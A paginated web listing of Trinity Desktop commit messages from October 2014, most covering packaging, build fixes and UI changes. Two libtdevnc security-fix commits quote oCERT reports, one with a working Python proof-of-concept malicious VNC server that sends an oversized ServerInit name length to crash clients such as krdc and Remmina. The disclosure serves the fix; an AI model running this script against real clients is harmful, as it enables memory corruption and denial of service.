Note that you can limit your full-text search to a specific module with the 'module:' keyword. Example: 'module:tdebase <search text>'

[First Page] [Previous Page]  [Next Page] [Last Page]


GIT HashBranchDateAuthorLog Message
feb4f340 [view]master2014-10-11 14:14:41 -0500Timothy Pearson[knemo] Fix Keywords separators to match XDG desktop specifications
0a489e6f [view]master2014-10-11 14:14:36 -0500Timothy Pearson[kiosktool] Fix Keywords separators to match XDG desktop specifications
769e2917 [view]master2014-10-11 14:14:15 -0500Timothy Pearson[k3b] Fix Keywords separators to match XDG desktop specifications
d2f248bc [view]master2014-10-11 14:14:03 -0500Timothy Pearson[experimental] Fix Keywords separators to match XDG desktop specifications
aa180a02 [view]master2014-10-11 20:36:38 +0200François Andriot[tde-packaging] RPM Packaging: update filesystem
67feb4c0 [view]master2014-10-11 19:55:49 +0200François Andriot[tde-packaging] RPM packaging: update filesystem
3769b5bd [view]master2014-10-11 18:12:26 +0200François Andriot[tde-packaging] openbsd: add tdebase package
80079a90 [view]master2014-10-11 18:10:48 +0200François Andriot[tde-packaging] RPM packaging: update build scripts
bcbde031 [view]master2014-10-11 18:10:20 +0200François Andriot[tde-packaging] Openbsd: update packages
26d0ed55 [view]master2014-10-11 18:08:25 +0200François Andriot[tde-packaging] RPM Packaging: update R14 packages
373dcb07 [view]master2014-10-11 17:55:52 +0200François Andriot[tdebase] Fix FTBFS due to missing return values
c8b810f1 [view]master2014-10-11 17:45:18 +0200François Andriot[tdelibs] Fix tdesu process handling
8f117582 [view]master2014-10-11 17:29:32 +0200François Andriot[tdelibs] Fix FTBFS with libmagic < 4.23
9d6aafbf [view]master2014-10-11 12:57:05 +0200François Andriot[tde-packaging] RPM Packaging: update libart_lgpl
83a1d459 [view]master2014-10-11 12:56:24 +0200François Andriot[tde-packaging] RPM Packaging: update dbus-tqt
1694f195 [view]master2014-10-11 12:51:59 +0200François Andriot[tde-packaging] RPM Packaging: update dbus-1-tqt
b4aa4618 [view]master2014-10-11 12:27:23 +0200François Andriot[tde-packaging] RPM Packaging: cleanup tqtinterface
fa814aea [view]master2014-10-11 12:15:57 +0200François Andriot[tde-packaging] RPM packaging: cleanup arts
e0568ac6 [view]master2014-10-11 12:01:56 +0200François Andriot[tde-packaging] RPM Packaging: update and cleanup tdemultimedia
6caf07a2 [view]master2014-10-11 17:57:21 +0900Michele Calgaro[tde-packaging] Fixed detection of location of tqt documentation files. This relates to bug #1859
d8d566bb [view]master2014-10-11 00:19:05 -0500Timothy Pearson[tdebase] Fix Konsole cursor redraw on focus in
This was accidentally broken in commit efdf0bbc
This resolves Bug #2142
4dd12b75 [view]master2014-10-10 17:41:45 -0500Timothy Pearson[tde-packaging] Fix synaptic-trinity package
93915c7d [view]master2014-10-11 00:28:03 +0200François Andriot[tde-packaging] RPM Packaging: update tdelibs
ecddfc25 [view]master2014-10-10 23:52:52 +0200François Andriot[tde-packaging] RPM Packaging: update tqt3
139ae8cb [view]master2014-10-10 23:30:34 +0200François Andriot[tde-packaging] RPM Packages: update build scripts
a6fb2684 [view]master2014-10-10 23:29:53 +0200François Andriot[tde-packaging] RPM Packaging: update packages R14
4a4ab6e8 [view]master2014-10-10 16:26:05 -0500Timothy Pearson[tde-packaging] Make Debian and Ubuntu TDE metapackages depend on synaptic-trinity
This is quite reasonable as Synaptic is tiny yet is the most common way to manage packages on Debian-based systems
d03ef693 [view]master2014-10-10 16:11:08 -0500Timothy Pearson[tde] Add synaptic-trinity metapackage folder
439dfafd [view]master2014-10-10 23:07:02 +0200François Andriot[tde-packaging] Openbsd: add tdelibs
56af15d9 [view]master2014-10-10 16:05:21 -0500Timothy Pearson[tde-packaging] Add synaptic-trinity metapackage to work around Bug #1494
276f3d18 [view]master2014-10-10 15:53:02 -0500Timothy Pearson[tdebase] Add missing files from commit f4dab230
This relates to Bug #1499
bd1f9bec [view]master2014-10-10 14:57:34 -0500Timothy Pearson[tdeadmin] Add handbookSection support to tabbed "Internet & Network" TDEControl modules
This relates to Bug #1850
2cffbbca [view]master2014-10-10 14:57:12 -0500Timothy Pearson[tdenetwork] Add handbookSection support to tabbed "Internet & Network" TDEControl modules
This relates to Bug #1850
0014712b [view]master2014-10-10 14:55:30 -0500Timothy Pearson[tdebase] Add handbookSection support to tabbed "Internet & Network" TDEControl modules
This relates to Bug #1850
7ef0ae90 [view]master2014-10-10 16:47:07 +0200Christian Beier[libtdevnc] Fix possible libvncclient ServerInit memory corruption.
This fixes the following oCERT report (oCERT-2014-008 pt.2):
There is a similar vulnerability to the previous one I sent. This is related to the ServerInit message where the width, the height of the server's framebuffer, its pixel format, and the name are sent to the client. The name can be used in a malicious manner to trigger a memory corruption in the client.
Field Size
---------------------------------
name-length [4]
name-string [name-length]
Below you will find a PoC script to show the vulnerability. This was tested on Fedora 20 with the latest version of krdc.
I have noticed something, where the memory corruption causes the program to hang but allows you to try to disconnect. After this it hangs. Occasionally there will be segmentation fault in memcpy. This can become more reliable if you connect to a different VNC server first (Or the wrong port on the malicious server) then connecting to the malicious port. Every time I accidentally made the wrong VNC connection attempt the next time I connected it segfault'd.
Just run the script it will listen on port 5900 and connect to it with krdc for example. I have observed Remmina crash more reliably.
import socket,struct,sys
HOST = ""
PORT = 5900
c = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
c.bind((HOST,PORT))
c.listen(1)
conn,addr = c.accept()
print "Connected by ", addr
protocolVersion3008 = "\x52\x46\x42\x20\x30\x30\x33\x2e\x30\x30\x38\x0a"
conn.send(protocolVersion3008)
data = conn.recv(1024) # Receive the version from them.
secTypeNone = "\x01\x01"
secTypeAuth = "\x01\x02"
conn.send(secTypeNone)
data = conn.recv(1024) # Receive the secType choice from them.
secResultOk = "\x00" * 4
secResultNo = "\x00\x00\x00\x01"
conn.send(secResultOk)
data = conn.recv(1024) # Receive the ClientInit (Shared-flag).
frameBufferWidth = 0x0480
frameBufferHeight = 0x0360
bitsPerPixel = 0x20
depth = 0x18
bigEndian = 0x1
trueColor = 0x0
redM = 0x0
greenM = 0x0
blueM = 0x0
redS = 0x0
greenS = 0x0
blueS = 0x0
padding = "\x00\x00\x00"
nameLength = 0xffffffff
nameString = "AA" * 0xFFFF + "\x00\x0a"
conn.send( struct.pack(">HHBBBBHHHBBB",frameBufferWidth, frameBufferHeight, bitsPerPixel, depth, bigEndian, trueColor, redM, greenM, blueM, redS, greenS, blueS) + padding + struct.pack(">I", nameLength) + nameString )
c.close()
e35c7619 [view]master2014-10-10 23:04:26 +0900Michele Calgaro[tdevelop] Updated python 2 and added python 3 TDevelop documentation toc files. This relates to bug #1859
24e31dab [view]master2014-10-10 14:40:48 +0200Slávek Banko[k9copy] Build av_free_packet_internal always, regardless av_free_packet
This resolves FTBFS if av_free_packet exists
95efcfbf [view]master2014-10-10 13:51:48 +0200Christian Beier[libtdevnc] Fix potential memory corruption in libvncclient.
Fixes (maybe amongst others) the following oCERT report ([oCERT-2014-008]):
LibVNCServer HandleRFBServerMessage rfbServerCutText malicious msg.sct.length
It looks like there may be a chance for potential memory corruption when a LibVNCServer client attempts to process a Server Cut Text message.
case rfbServerCutText:
{
char *buffer;
if (!ReadFromRFBServer(client, ((char *)&msg) + 1,
sz_rfbServerCutTextMsg - 1))
return FALSE;
msg.sct.length = rfbClientSwap32IfLE(msg.sct.length); << Retrieve malicious length
buffer = malloc(msg.sct.length+1); << Allocate buffer. Can return 0x0
if (!ReadFromRFBServer(client, buffer, msg.sct.length)) << Attempt to write to buffer
return FALSE;
buffer[msg.sct.length] = 0; << Attempt to write to buffer
if (client->GotXCutText)
client->GotXCutText(client, buffer, msg.sct.length); << Attempt to write to buffer
free(buffer);
break;
}
If a message is provided with an extremely large size it is possible to cause the malloc to fail, further leading to an attempt to write 0x0.
b716b5e0 [view]master2014-10-10 13:03:25 +0200Slávek Banko[tde-packaging] Add libswscale-dev build-dep in k9copy on Debian and Ubuntu
2897194b [view]master2014-10-10 13:03:04 +0200Slávek Banko[k9copy] Fix FTBFS from commit 0e824732
cc12a51c [view]master2014-10-09 22:07:33 -0500Timothy Pearson[tdebase] Link tabs to handbook sections in Style and Panels tdecontrol modules
This relates to Bug #1850
9a6735bb [view]master2014-10-09 22:06:23 -0500Timothy Pearson[tdelibs] Add handbookSection method to TDECModuleContainer
This relates to Bug #1850
54aa2cd4 [view]master2014-10-09 16:18:44 -0500Timothy Pearson[tdelibs] Fix prior commit
47d28387 [view]master2014-10-09 16:14:40 -0500Timothy Pearson[tdelibs] Load proper handbook section when a TDEControl module is loaded via tdecmshell instead of kcontrol
This relates to Bug #1850
abd304ad [view]master2014-10-09 21:08:20 +0200Slávek Banko[tde-packaging] Add support for lcms2 in tdegraphics on Debian and Ubuntu
b34c4d8c [view]master2014-10-09 21:08:16 +0200Slávek Banko[tdegraphics] Add support for lcms2
c0913ce6 [view]master2014-10-09 13:29:39 -0500Timothy Pearson[tdemultimedia] Fix artsd exiting on Xine-generated Xorg errors
This relates to Bug #2150
Fix Kaboodle not playing newly loaded videos
This relates to Bug #1905
4e5a99f6 [view]master2014-10-09 11:11:44 -0500Timothy Pearson[tdebase] Reset keyboard selection when using mouse rubberband to select items
This relates to Bug #1961
21679472 [view]master2014-10-09 11:08:39 -0500Timothy Pearson[tdelibs] Add protected helper methods to better handle rubberband operations outside of a TDEListView in file manager mode
This relates to Bug #1961
cdc5b519 [view]master2014-10-09 17:07:49 +0200Christian Beier[libtdevnc] Update NEWS for 0.9.10.
eeeb5475 [view]master2014-10-09 16:48:59 +0200Christian Beier[libtdevnc] Update AUTHORS.
0735a01b [view]master2014-10-09 19:30:10 +0900Michele Calgaro[tdevelop] Updated openGL TDevelop documentation toc files. This relates to bug #1859
03a61295 [view]master2014-10-09 03:17:02 +0200Slávek Banko[tdelibs] Fix FTBFS on missing magic_getpath
1c137dac [view]master2014-10-08 15:41:08 -0500Timothy Pearson[tellico] Fix TDEHotNewStuff interface with OCS providers
This relates to Bug #2127
a71fa095 [view]master2014-10-08 15:37:56 -0500Timothy Pearson[tdelibs] Add progress and error signals to tdenewstuff
This relates to Bug #2127
aae8990d [view]master2014-10-08 21:25:38 +0200François Andriot[tdelibs] Add a cmake detection for Xext library
Remove hardcoded Xext flags in tderandr and tdestyles/keramik
Add missing link flag in tdeui
3adf509a [view]master2014-10-08 21:24:13 +0200François Andriot[tdelibs] Fix ucred support in openbsd
58c3aed2 [view]master2014-10-08 12:01:23 -0500Timothy Pearson[tdelibs] Do not use magic_version function if magic version support not available
This relates to Bug #656
af30fd4f [view]master2014-10-08 11:26:02 -0500Timothy Pearson[tde-packaging] Enable k3b debug packages
8cf0c7a8 [view]master2014-10-08 15:29:19 +0200Slávek Banko[tde-packaging] Add support for lcms2 in libkdcraw on Debian and Ubuntu
87d533f7 [view]master2014-10-08 15:29:02 +0200Slávek Banko[libkdcraw] Add support for lcms2
f26ca140 [view]master2014-10-08 19:20:16 +0900Michele Calgaro[tdevelop] Updated GNUstep TDevelop documentation toc files. This relates to bug #1859
cb2afcad [view]master2014-10-08 18:34:50 +0900Michele Calgaro[tdevelop] Removed QtRuby and Korundrum since the referred documentantion is no longer available. This relates to bug #1859
123dd355 [view]master2014-10-08 18:31:12 +0900Michele Calgaro[tdevelop] Revert "Sort Documentation pane list in alphabetical order. This relates to bug #1859"
because the change also sort subitems, messing up the order of entries in most of the sublists.
Need to find a different way to sort the mail list.
This reverts commit b98d05cb4db601d354d72915a57a09affb2ab29a.
a44c9249 [view]master2014-10-08 00:44:44 -0500Timothy Pearson[tdelibs] Update mimetypes in Kate plugins to match output of libmagic
This relates to Bug #2148
f4dab230 [view]master2014-10-08 00:33:34 -0500Timothy Pearson[tdebase] Push the top menu banner support patches from Bug #1499
These are disabled by default and need additional repair but this is a good start
4724b1a8 [view]master2014-10-07 23:26:42 -0500Timothy Pearson[tdebase] Push the following patches from Bug #1499:
tdebase: updates default Xorg arguments in TDM
tdebase: add ability to restrict the konqueror side bar
4d21a120 [view]master2014-10-07 21:52:26 -0500Timothy Pearson[tdebase] Commit the following patch from Bug #1499:
tdebase: fix kdesktop resize bug
c359057c [view]master2014-10-07 21:48:28 -0500Timothy Pearson[tdelibs] Makes favorite URLs in TDE file open/save dialogs global (sared amongst all applications) by default
This commits the following patch from Bug #1499:
tdelibs: fix kurlbar global
c1098677 [view]master2014-10-07 16:38:40 -0500Timothy Pearson[tdelibs] Add the following patch from Bug #1499
tdelibs: add postofficebox suppot in tdeabc
f8790c70 [view]master2014-10-07 16:09:51 -0500Timothy Pearson[tdelibs] Fix certain shell scripts not being identified
This relates to Bug #656
Clean up some old development debug statements
30c2b7e4 [view]master2014-10-07 15:35:07 -0500Timothy Pearson[tdelibs] Autodetect downloaded mime type and compare against category; if wallpaper downloads something other than image abort
This relates to Bug #2127
3ad3711e [view]master2014-10-07 20:25:13 +0200François Andriot[tde-packaging] RPM Packaging: update brp-check-trinity
d47bc317 [view]master2014-10-07 20:23:38 +0200François Andriot[tde-packaging] RPM Packaging: update tdebase
8c8c70f8 [view]master2014-10-07 20:15:11 +0200François Andriot[tde-packaging] RPM Packaging: add brp-check-trinity
e5f89821 [view]master2014-10-07 12:03:35 -0500Timothy Pearson[tdelibs] Fix libmime database load once and for all
This relates to Bug #656
72a2afc0 [view]master2014-10-07 10:59:55 -0500Timothy Pearson[tdelibs] Add proper OCS support to the base TDENewStuff class
This relates to Bug #2127
26d5253c [view]master2014-10-07 17:21:02 +0200Christian Beier[libtdevnc] Ship the required macros in the m4/ directory.
This is recommended practice as per
https://www.gnu.org/software/automake/manual/html_node/Local-Macros.html.
It fixes the problem that arose when one of the maintainers could not build LibVNCServer
after https://github.com/LibVNC/libvncserver/pull/38 was merged.
Symptoms included
checking whether make sets $(MAKE)... yes
./configure: line 2481: syntax error near unexpected token `rfb/rfbconfig.h'
./configure: line 2481: `AX_PREFIX_CONFIG_H(rfb/rfbconfig.h)'
until autoconf-archive was installed (which was a previously unmentioned
requirement for Pull Request #38) – this is not always an option, in particular
when the project needs to be built using a system-wide autoconf installation
that cannot be modified easily by the developer.
b98d05cb [view]master2014-10-07 22:45:44 +0900Michele Calgaro[tdevelop] Sort Documentation pane list in alphabetical order. This relates to bug #1859
ea0e9842 [view]master2014-10-07 15:16:06 +0200Johannes Schindelin[libtdevnc] Add back a working autogen.sh
There was no reason to get rid of the convenient script. Most developers
who are not in love with autoconf fail to remember that autoreconf
invocation, therefore it is better to have something working in place.
Signed-off-by: Johannes Schindelin
62e6de96 [view]master2014-10-07 13:19:34 +0900Michele Calgaro[tdevelop] Updated some TDevelop documentation toc files. This relates to bug #1859
SuperWaba documentation has been removed since the project has been discontinued.
0b607f0a [view]master2014-10-07 01:28:03 +0200Slávek Banko[tde-packaging] Explicitly enable WITH_TDEHWLIB in tdelibs on Debian and Ubuntu
d227c416 [view]master2014-10-07 01:01:20 +0200Slávek Banko[tdelibs] Fix dependencies in CMake targets
84e3f9e0 [view]master2014-10-07 01:00:47 +0200François Andriot[tdelibs] Allow conditional build of tdehwlib
e255a8ca [view]master2014-10-07 00:35:21 +0200François Andriot[tdelibs] Fix openpty detection on openbsd
223f0c75 [view]master2014-10-07 00:11:31 +0200François Andriot[tdelibs] Enable previously disabled build options in config.h
62bfcbe4 [view]master2014-10-06 16:19:57 -0500Timothy Pearson[tdelibs] Fix loading of additional mime magic files
This resolves Bug #656
914e923d [view]master2014-10-06 15:47:39 -0500Timothy Pearson[tdeadmin] Remove many obsolete distributions and add newer distributions instead
This resolves Bug #1879
a3e63055 [view]master2014-10-06 14:13:32 -0500Timothy Pearson[tdelibs] Allow suspend/hibernate/freeze/etc. when $HOME is an NFS share
This resolves Bug #1623
0e824732 [view]master2014-10-06 14:10:23 -0500Timothy Pearson[k9copy] Fix another crash casued by old av_packet_free routine
effa31d9 [view]master2014-10-06 14:02:57 -0500Timothy Pearson[k9copy] Fix crash when img_convert unavailable
83bf1f59 [view]master2014-10-06 20:14:09 +0200newsoft[libtdevnc] Fix multiple stack-based buffer overflows in file transfer feature
8220f4da [view]master2014-10-06 20:13:00 +0200newsoft[libtdevnc] Make sure that no integer overflow could occur during scaling
18d94a86 [view]master2014-10-06 13:05:06 -0500Timothy Pearson[k9copy] Delete unneeded subdirs file
bf559326 [view]master2014-10-06 13:04:57 -0500Francois Andriot[k9copy] Fix crash when authoring DVD and selecting video file
855439d3 [view]master2014-10-06 12:15:57 -0500Timothy Pearson[tde-packaging] Update Debian and Ubuntu packaging for latest GIT sources
77a1b11d [view]master2014-10-06 12:15:23 -0500Timothy Pearson[tdebase] Distinguish between CD types in media tdeioslave popups
This resolves Bug #1371
9cb7d731 [view]master2014-10-06 11:38:24 -0500Timothy Pearson[tdelibs] Push the following patches to GIT from Bug #1499:
tdelibs: disable kfiledialogbox OK button if user has no permission on file
tdelibs: fix https loop
tdelibs: fix groups in kdialogpropertiesdialog
tdelibs: avoid assertion in tdeio karchive
aaf2ebb5 [view]master2014-10-06 17:41:46 +0200Slávek Banko[tdebase] Fix dependencies in CMake targets
e6f93af3 [view]master2014-10-06 18:52:51 +0900Michele Calgaro[tdevelop] Updated svg TDevelop documentation toc files. This relates to bug #1859

List generated Thu Jun 26 20:18:02 2025
Currently showing patches 35401 to 35500 of 53169 [View All on Single Page]
Note that you can limit your full-text search to a specific module with the 'module:' keyword. Example: 'module:tdebase <search text>'

[First Page] [Previous Page]  [Next Page] [Last Page]